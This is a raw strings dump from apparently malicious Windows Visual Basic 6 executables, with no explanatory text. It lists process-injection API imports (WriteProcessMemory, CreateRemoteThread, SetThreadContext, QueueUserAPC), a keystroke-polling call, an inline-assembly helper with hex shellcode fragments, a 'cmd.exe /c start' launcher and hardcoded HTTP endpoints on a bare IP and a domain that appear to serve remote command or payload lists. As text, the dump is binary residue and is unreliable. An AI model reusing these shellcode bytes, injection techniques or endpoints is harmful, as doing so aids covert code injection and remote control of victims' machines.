.text
`.data
.rsrc
MSVBVM60.DLL
vb6chs.dll
Module1
kernel32
OpenProcess
WaitForSingleObject
CloseHandle
TerminateProcess
VBA6.DLL
__vbaAryDestruct
__vbaExitProc
__vbaFreeVarList
__vbaVarCat
__vbaObjSet
__vbaSetSystemError
__vbaFpI4
__vbaFileClose
__vbaPutOwner3
__vbaFileOpen
__vbaFreeVar
__vbaVar2Vec
__vbaStrMove
__vbaAryMove
__vbaFreeObj
__vbaFreeStr
__vbaHresultCheckObj
__vbaNew2
__vbaStrCat
__vbaOnError
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaAryMove
__vbaFreeVar
__vbaFreeVarList
_adj_fdiv_m64
_adj_fprem1
__vbaStrCat
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaOnError
__vbaObjSet
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaChkstk
__vbaFileClose
__vbaPutOwner3
DllFunctionCall
_adj_fpatan
_CIsqrt
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaVarCat
_CIlog
__vbaFileOpen
__vbaNew2
__vbaVar2Vec
_adj_fdiv_m32i
_adj_fdivr_m32i
_adj_fdivr_m32
_adj_fdiv_r
__vbaFpI4
_CIatan
__vbaStrMove
_allmul
_CItan
_CIexp
__vbaFreeStr
__vbaFreeObj
.text
`.data
.rsrc
@.reloc
MSVBVM60.DLL
vb6chs.dll
leQHr)
ModDLL
Form1
clsASM
ModYH
ModDXC
Module1
AsmGetCpu
kernel32
GetModuleHandleA
CreateRemoteThread
GetModuleHandleW
SUB_ESI
GetCurrentThreadId
GetCurrentProcessId
GetCurrentThread
ResumeThread
user32
AttachThreadInput
SuspendThread
TerminateThread
Sleep
winmm.dll
timeGetTime
DebugBreak
QueueUserAPC
TerminateProcess
ExtractIconA
timeBeginPeriod
timeEndPeriod
OpenThread
FreeLibrary
WaitForSingleObject
SetWindowLongA
shell32.dll
SUB_EDX
FreeLibraryAndExitThread
InitializeCriticalSection
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
comctl32
InitCommonControls
ole32.dll
CoInitializeEx
msvbvm60.dll
VBDllGetClassObject
UserDllMain
CreateThread
GetAsyncKeyState
SUB_EBX_EAX
CoInitialize
CoUninitialize
CreateIExprSrvObj
ReadProcessMemory
ExitProcess
MessageBoxA
SUB_EBX
MessageBoxW
FindWindowA
PostMessageA
SetUnhandledExceptionFilter
RtlMoveMemory
VirtualQuery
GetModuleFileNameA
RaiseException
GetThreadContext
SetThreadContext
SUB_ECX
WriteProcessMemory
MsgWaitForMultipleObjects
oleaut32.dll
OleLoadPicturePath
VirtualFreeEx
CloseHandle
SUB_EAX_EDX
Wsock32.dll
htonl
LoadLibraryA
GetProcAddress
kernel32.dll
RtlZeroMemory
VirtualProtect
msvbvm60
EbLibraryUnload
CallWindowProcA
VirtualAllocEx
VBA6.DLL
EbShowToolTips
SendMessageA
PostThreadMessageA
GetMessageA
SUB_EAX
OpenProcess
GetLastError
CreateEventA
Na(uA
IClass
C:\windows\SysWow64\MSVBVM60.DLL\3
VBRUN
Run_ASM
Int2Hex
Leave
Pushad
Popad
IN_AL_DX
TEST_EAX_EAX
Add_EAX_EDX
Add_EBX_EAX
Add_EAX_DWORD_Ptr
Add_EBX_DWORD_Ptr
Add_EBP_DWORD_Ptr
Add_EAX
Add_EBX
Add_ECX
Add_EDX
Add_ESI
Add_ESP
SUB_ESP
Call_EAX
Call_EBX
Call_ECX
Call_EDX
Call_ESI
Call_ESP
Call_EBP
Call_EDI
Call_DWORD_Ptr
Call_DWORD_Ptr_EAX
Call_DWORD_Ptr_EBX
Cmp_EAX
Cmp_El
Cmp_EAX_EDX
Cmp_EAX_DWORD_Ptr
Cmp_DWORD_Ptr_EAX
Dec_EAX
Dec_EBX
Dec_ECX
Dec_EDX
Idiv_EAX
Idiv_EBX
Idiv_ECX
Idiv_EDX
Imul_EAX_EDX
Imul_EAX
ImulB_EAX
Inc_EAX
Inc_EBX
Inc_ECX
Inc_EDX
Inc_EDI
Inc_ESI
Inc_DWORD_Ptr_EAX
Inc_DWORD_Ptr_EBX
Inc_DWORD_Ptr_ECX
Inc_DWORD_Ptr_EDX
JMP_EAX
JMP_DWORD_Ptr_ESP
JNZ_Y
Mov_DWORD_Ptr_EAX
Mov_EAX
Mov_EBX
Mov_ECX
Mov_EDX
Mov_ESI
Mov_ESP
Mov_EBP
Mov_EDI
Mov_EBX_DWORD_Ptr
Mov_ECX_DWORD_Ptr
Mov_EAX_DWORD_Ptr
Mov_EDX_DWORD_Ptr
Mov_ESI_DWORD_Ptr
Mov_ESP_DWORD_Ptr
Mov_EBP_DWORD_Ptr
Mov_EAX_DWORD_Ptr_EAX
Mov_EAX_DWORD_Ptr_EBP
Mov_EAX_DWORD_Ptr_EBX
Mov_EAX_DWORD_Ptr_ECX
Mov_EAX_DWORD_Ptr_EDX
Mov_EAX_DWORD_Ptr_EDI
Mov_EAX_DWORD_Ptr_ESP
Mov_EAX_DWORD_Ptr_ESI
Mov_EAX_DWORD_Ptr_EAX_Add
Mov_EAX_DWORD_Ptr_ESP_Add
Mov_EAX_DWORD_Ptr_EBX_Add
Mov_EAX_DWORD_Ptr_ECX_Add
Mov_EAX_DWORD_Ptr_EDX_Add
Mov_EAX_DWORD_Ptr_EDI_Add
Mov_EAX_DWORD_Ptr_EBP_Add
Mov_EAX_DWORD_Ptr_ESI_Add
Mov_EBX_DWORD_Ptr_EAX_Add
Mov_ECX_DWORD_Ptr_EBX
Mov_EBX_DWORD_Ptr_ESP_Add
Mov_EBX_DWORD_Ptr_EBX_Add
Mov_EBX_DWORD_Ptr_ECX_Add
Mov_EBX_DWORD_Ptr_EDX_Add
Mov_EBX_DWORD_Ptr_EDI_Add
Mov_EBX_DWORD_Ptr_EBP_Add
Mov_EBX_DWORD_Ptr_ESI_Add
Mov_ECX_DWORD_Ptr_EAX_Add
Mov_ECX_DWORD_Ptr_ESP_Add
Mov_ECX_DWORD_Ptr_EBX_Add
Mov_ECX_DWORD_Ptr_ECX_Add
Mov_ECX_DWORD_Ptr_EDX_Add
Mov_ECX_DWORD_Ptr_EDI_Add
Mov_ECX_DWORD_Ptr_EBP_Add
Mov_ECX_DWORD_Ptr_ESI_Add
Mov_EDX_DWORD_Ptr_EAX_Add
Mov_EDX_DWORD_Ptr_ESP_Add
Mov_EDX_DWORD_Ptr_EBX_Add
Mov_EDX_DWORD_Ptr_ECX_Add
Mov_EDX_DWORD_Ptr_EDX_Add
Mov_EDX_DWORD_Ptr_EDI_Add
Mov_EDX_DWORD_Ptr_EBP_Add
Mov_EDX_DWORD_Ptr_ESI_Add
Mov_EBX_DWORD_Ptr_EAX
Mov_EBX_DWORD_Ptr_EBP
Mov_EBX_DWORD_Ptr_EBX
Mov_EBX_DWORD_Ptr_ECX
Mov_EBX_DWORD_Ptr_EDX
Mov_EBX_DWORD_Ptr_EDI
Mov_EBX_DWORD_Ptr_ESP
Mov_EBX_DWORD_Ptr_ESI
Mov_ECX_DWORD_Ptr_EAX
Mov_ECX_DWORD_Ptr_EBP
Mov_ECX_DWORD_Ptr_ECX
Mov_ECX_DWORD_Ptr_EDX
Mov_ECX_DWORD_Ptr_EDI
Mov_ECX_DWORD_Ptr_ESP
Mov_ECX_DWORD_Ptr_ESI
Mov_EDX_DWORD_Ptr_EAX
Mov_EDX_DWORD_Ptr_EBP
Mov_EDX_DWORD_Ptr_EBX
Mov_EDX_DWORD_Ptr_ECX
Mov_EDX_DWORD_Ptr_EDX
Mov_EDX_DWORD_Ptr_EDI
Mov_EDX_DWORD_Ptr_ESI
Mov_EDX_DWORD_Ptr_ESP
Mov_EAX_EBP
Mov_EAX_EBX
Mov_EAX_ECX
Mov_EAX_EDI
Mov_EAX_EDX
Mov_EAX_ESI
Mov_EAX_ESP
Mov_EBX_EBP
Mov_EBX_EAX
Mov_EBX_ECX
Mov_EBX_EDI
Mov_EBX_EDX
Mov_EBX_ESI
Mov_EBX_ESP
Mov_ECX_EBP
Mov_ECX_EAX
Mov_ECX_EBX
Mov_ECX_EDI
Mov_ECX_EDX
Mov_ECX_ESI
Mov_ECX_ESP
Mov_EDX_EBP
Mov_EDX_EBX
Mov_EDX_ECX
Mov_EDX_EDI
Mov_EDX_EAX
Mov_EDX_ESI
Mov_EDX_ESP
Mov_ESI_EBP
Mov_ESI_EBX
Mov_ESI_ECX
Mov_ESI_EDI
Mov_ESI_EAX
Mov_ESI_EDX
Mov_ESI_ESP
Mov_ESP_EBP
Mov_ESP_EBX
Mov_ESP_ECX
Mov_ESP_EDI
Mov_ESP_EAX
Mov_ESP_EDX
Mov_ESP_ESI
Mov_EDI_EBP
Mov_EDI_EAX
Mov_EDI_EBX
Mov_EDI_ECX
Mov_EDI_EDX
Mov_EDI_ESI
Mov_EDI_ESP
Mov_EBP_EDI
Mov_EBP_EAX
Mov_EBP_EBX
Mov_EBP_ECX
Mov_EBP_EDX
Mov_EBP_ESI
Mov_EBP_ESP
Mov_EDI_EDI
Push_DWORD_Ptr
Push_EAX
Push_ECX
Push_EDX
Push_EBX
Push_ESP
Push_EBP
Push_ESI
Push_EDI
Lea_EAX_DWORD_Ptr_EAX_Add
Lea_EAX_DWORD_Ptr_EBX_Add
Lea_EAX_DWORD_Ptr_ECX_Add
Lea_EAX_DWORD_Ptr_EDX_Add
Lea_EAX_DWORD_Ptr_ESI_Add
Lea_EAX_DWORD_Ptr_ESP_Add
Lea_EAX_DWORD_Ptr_EBP_Add
Lea_EAX_DWORD_Ptr_EDI_Add
Lea_EBX_DWORD_Ptr_EAX_Add
Lea_EBX_DWORD_Ptr_ESP_Add
Lea_EBX_DWORD_Ptr_EBX_Add
Lea_EBX_DWORD_Ptr_ECX_Add
Lea_EBX_DWORD_Ptr_EDX_Add
Lea_EBX_DWORD_Ptr_EDI_Add
Lea_EBX_DWORD_Ptr_EBP_Add
Lea_EBX_DWORD_Ptr_ESI_Add
Lea_ECX_DWORD_Ptr_EAX_Add
Lea_ECX_DWORD_Ptr_ESP_Add
Lea_ECX_DWORD_Ptr_EBX_Add
Lea_ECX_DWORD_Ptr_ECX_Add
Lea_ECX_DWORD_Ptr_EDX_Add
Lea_ECX_DWORD_Ptr_EDI_Add
Lea_ECX_DWORD_Ptr_EBP_Add
Lea_ECX_DWORD_Ptr_ESI_Add
Lea_EDX_DWORD_Ptr_EAX_Add
Lea_EDX_DWORD_Ptr_ESP_Add
Lea_EDX_DWORD_Ptr_EBX_Add
Lea_EDX_DWORD_Ptr_ECX_Add
Lea_EDX_DWORD_Ptr_EDX_Add
Lea_EDX_DWORD_Ptr_EDI_Add
Lea_EDX_DWORD_Ptr_EBP_Add
Lea_EDX_DWORD_Ptr_ESI_Add
Pop_EAX
Pop_EBX
Pop_ECX
Pop_EDX
Pop_ESI
Pop_ESP
Pop_EDI
Pop_EBP
!jWW?
VBA6.DLL
__vbaVarDup
Label1
__vbaObjSetAddref
__vbaAryDestruct
__vbaStrVarCopy
__vbaInStrB
__vbaFreeVarList
__vbaStrVarMove
__vbaAryConstruct2
__vbaFreeVar
__vbaStrCat
__vbaStrMove
Command1
__vbaFreeStr
__vbaStrCopy
__vbaFreeStrList
__vbaStrToAnsi
__vbaFreeObj
__vbaHresultCheckObj
__vbaNew2
__vbaSetSystemError
NagS_MRC
__vbaVarCat
v|T$U
__vbaStrToUnicode
__vbaStrI4
Label2
__vbaLsetFixstrFree
__vbaFixstrConstruct
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
List1
Picture1
Picture2
Timer1
SetWindowTextA
SetParent
MoveWindow
GetWindowRect
FindWindowExA
GetWindow
GetWindowTextA
GetClassNameA
SetCapture
ReleaseCapture
ShowWindow
__vbaFreeObjList
__vbaObjSet
__vbaVarTstEq
__vbaVarCopy
__vbaVarVargNofree
__vbaVarAdd
__vbaAryUnlock
__vbaAryLock
__vbaI4Str
__vbaR8Str
__vbaUI1ErrVar
__vbaUbound
__vbaLenBstr
__vbaFpI4
__vbaRedim
__vbaObjVar
__vbaVarSetObjAddref
__vbaVarLateMemCallLd
__vbaVarMove
__vbaVargVar
__vbaLateMemCall
__vbaVarLateMemSt
__vbaVarSetVar
__vbaExitProc
__vbaStrVarVal
__vbaVarTstNe
__vbaI4Var
__vbaCastObjVar
__vbaOnError
__vbaCastObj
__vbaVar2Vec
__vbaAryMove
__vbaAryVar
__vbaAryCopy
__vbaVarIndexLoad
__vbaFpUI1
__vbaRefVarAry
__vbaBoolVar
GlobalAlloc
__vbaStrCmp
__vbaVarMul
__vbaVarInt
__vbaUI1Var
__vbaVarForNext
__vbaVarForInit
Form1
Form1
Timer1
Picture2
Label2
Label2
List1
Picture1
Line1
Line1
Line1
Label1
Label1
Label1
Label1
Command1
Command1
Value
Ph4e@
PhHe@
Ph,`@
9=XKB
Rh(@B
Qh||@
RhL{@
Qh(}@
Rhd}@
Ph(~@
4Phxd@
1.vbp
CUSTOM
\123.exe
CUSTOM
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
080404B0
CompanyName
ProductName
FileVersion
ProductVersion
InternalName
OriginalFilename
1.exe
).vbp
64A1300000008B400C8B400C8B5818 3B5C24 04 90 7505 8B40 28 EB048B00 EBED C2 04 00
User32.dll
MessageBoxW
kernel32
FreeLibrary
shell32.dll
ExtractIconW
write
cmd.exe /c start
TForm1
0000000
0FAFC2
FF2424
8B4500
8B0424
8B4424
8B8424
8B5C24
8B9C24
8B4C24
8B8C24
8B5424
8B9424
8B5D00
8B1C24
8B4D00
8B0C24
8B5500
8B1424
8D4424
8D8424
8D5C24
8D9C24
8D4C24
8D8C24
8D5424
8D9424
WinHttp.WinHttpRequest.5.1
Cookie
Connection
keep-alive
Accept
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Accept-Language
zh-CN,zh;q=0.8
GB2312
Adodb.Stream
Write
Position
Charset
ReadText
Close
GetCurrentThreadId
60 68
FFD0 59 3BC8 75 0D 61 8BFF 55 8BEC B9
OLE32
CoGetClassObject
FFD1 83F8 01 74 E7
FFD1 83F8 00 75 07 83EC 18 C2 1400 90 90 90 90 90 90 90 90 90 90 90
Microsoft.XMLHTTP
8B4424 04 B9 00000000 83F9 18 74 08 FF3408 83C1 04 EB F3 58 FFD0 C2 0400
60 8B4424 64 3B4424 70 75 05 B8 01000000 5F 5E 5D 5C C3
60 68
ReadyState
FFD0 8B4424 24 FF30 8B48 04 51 8B70 10 8D78 14 83FE 00 74 08 83EE 04 FF343E EB F3 83F9 00 74 07 C741 08 02000000 FF70 10 90 90 90 90
59 FF540C 04
VirtualFreeEx
FFD0 83C4 08 61 C2 0400
833C24 00 74 0D 8B3C24 8947 0C 837F 10 01 74 23 90 68 00800000 6A 00 FF7424 28 6A FF B8
FFD0 B8
ole32.dll
CoUninitialize
FFD0 83C4 08 61 C2 0400
user32
PostMessageA
57 6A 02 68 0000 0000 FF35 0000 0000 B8
ResponseBody
http://122.114.30.56:5/sb/list.txt
http://122.114.30.56:5/sb/id.asp
http://m5588.cn:5/m/sb/list.txt
http://m5588.cn:5/m/sb/id.asp
541*1206
TTabSheet
TPageControl
B80000000033D20FA28915
B80100000033C933D20FA28915
00000000000000000000000000000000